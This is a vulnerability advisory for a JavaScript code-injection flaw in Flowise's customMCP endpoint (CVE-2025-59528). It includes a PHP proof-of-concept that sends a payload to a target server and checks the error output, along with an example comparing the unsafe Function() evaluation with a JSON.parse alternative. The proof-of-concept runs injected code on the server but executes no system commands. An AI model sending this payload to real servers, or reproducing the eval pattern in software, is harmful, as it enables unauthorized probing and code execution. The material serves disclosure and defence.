Flowise 3.0.6 JS Parsing Injection
=============================================================================================================================================
| # Title : Flowise 3.0.6 JS Parsing Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://flowiseai.com/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/211933/ & CVE-2025-59528
[+] Summary :
A JavaScript Parsing Injection vulnerability exists in the following Flowise versions:
  - Affected: >= 2.2.7-patch.1 and < 3.0.6
  - Unauthenticated exploitation possible for versions < 3.0.1
  - Authentication required for versions >= 3.0.1

The vulnerability resides in the endpoint: /api/v1/node-load-method/customMCP
Flowise internally evaluates user input using: Function('return ' + inputString)()
This unsafe parsing mechanism allows a remote attacker to inject malformed JavaScript payloads, causing unexpected parsing behavior, syntax exceptions, stack traces, and other abnormal internal execution paths.

This report does NOT demonstrate RCE and does NOT execute system commands.
It focuses strictly on parsing injection as requested.

2. Vulnerability Description

The parameter inputs.mcpServerConfig is passed directly to a JavaScript interpreter via: Function("return " + input)
Because Flowise does not sanitize or validate the input, an attacker can supply a malformed or intentionally broken JavaScript object to force Flowise to:
  - Attempt to interpret the injected JavaScript
  - Generate SyntaxError, ReferenceError, or Unexpected token exceptions
  - Leak internal execution traces
  - Confirm the backend is evaluating untrusted JS strings

This behavior proves the system is vulnerable to JavaScript parsing injection.
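
The evaluation pattern described above next to a data-only alternative, as an added example (not code from Flowise or from the original advisory). The allow-listed field names, the size limit and the sample config are assumptions, and the vendor's actual fix may differ.

```javascript
// Pattern quoted in the advisory: the string is compiled and executed as JavaScript.
function parseConfigUnsafe(input) {
  return Function('return ' + input)();
}

// Hypothetical allow-list of config fields and their JSON types (assumed, not Flowise's schema).
const ALLOWED = new Map([['command', 'string'], ['args', 'array'], ['env', 'object'], ['url', 'string']]);
const jsonType = (v) => (Array.isArray(v) ? 'array' : v === null ? 'null' : typeof v);

// Data-only alternative: JSON.parse never evaluates expressions, and the caller
// gets a fixed error message instead of an exception name or stack trace.
function parseConfigSafe(input) {
  const fail = { ok: false, error: 'Invalid mcpServerConfig' };
  if (typeof input !== 'string' || input.length > 8192) return fail;
  let value;
  try {
    value = JSON.parse(input);
  } catch (_) {
    return fail;
  }
  if (jsonType(value) !== 'object') return fail;
  for (const [key, v] of Object.entries(value)) {
    if (ALLOWED.get(key) !== jsonType(v)) return fail; // unknown key or wrong type
  }
  return { ok: true, config: value };
}

const PAGE_PAYLOAD = '{x:(function(){ invalid_code_here++ })()}'; // payload from the PoC on this page
const GOOD_CONFIG = '{"command":"npx","args":["-y","example-mcp-server"]}'; // constructed sample

// Report how each parser treats an input.
function classify(input) {
  let unsafe;
  try {
    parseConfigUnsafe(input);
    unsafe = 'evaluated';
  } catch (e) {
    unsafe = e.name; // ReferenceError here means the injected function body actually ran
  }
  return { unsafe, safe: parseConfigSafe(input).ok };
}

console.log(classify(PAGE_PAYLOAD));
console.log(classify(GOOD_CONFIG));
```

The ReferenceError from the unsafe path is a runtime error, not a parse error: it is raised only after the supplied function body has started executing, which is why the PoC's error-string check indicates evaluation of untrusted input.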

3. Impact

Although this report intentionally excludes RCE, the underlying unsafe parsing mechanism could be chained with additional primitives depending on deployment context.
The confirmed impact here is:
  - JavaScript parsing injection
  - Potential denial of service via crafted parsing payloads
  - Internal error leakage
  - Strong indicator of further exploitable unsafe evaluation paths

This advisory documents only the safe, non-executing variant.

poc
<?php
/**
 * Flowise JS Parsing Injection PoC by indoushka
 * -------------------------------------------------
 * Demonstrates unsafe JavaScript evaluation through controlled parsing failure.
 */
$target = "http://victim-flowise:3000/api/v1/node-load-method/customMCP";

// Malformed JS that forces the backend parser to reveal unsafe Function() behavior
$payload = '{x:(function(){ invalid_code_here++ })()}';

$data = [
    "loadMethod" => "listActions",
    "inputs" => [
        "mcpServerConfig" => $payload
    ]
];

$options = [
    "http" => [
        "header"        => "Content-Type: application/json\r\n",
        "method"        => "POST",
        "content"       => json_encode($data),
        "timeout"       => 6,
        // Return the body of 4xx/5xx replies as well; the error text is what gets inspected
        "ignore_errors" => true
    ]
];

echo "[*] Sending Parsing Injection Payload...\n";
$context = stream_context_create($options);
$response = @file_get_contents($target, false, $context);
echo "-----------------------------------\n";

// false means the request itself failed (an empty body is still a response)
if ($response === false) {
    echo "[!] Target did not respond.\n";
    exit;
}

// Detection patterns
if (preg_match('/SyntaxError|ReferenceError|Unexpected|stack/i', $response)) {
    echo "[+] Vulnerable: JS Parsing Injection confirmed.\n";
    echo "[+] Evidence: Backend attempted to interpret injected JS.\n";
} else {
    echo "[-] Not vulnerable or patched.\n";
}

echo "-----------------------------------\n";
echo "[*] Raw Response:\n$response\n";

Save as : poc.php
run : php poc.php
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
- Written by: khalil shreateh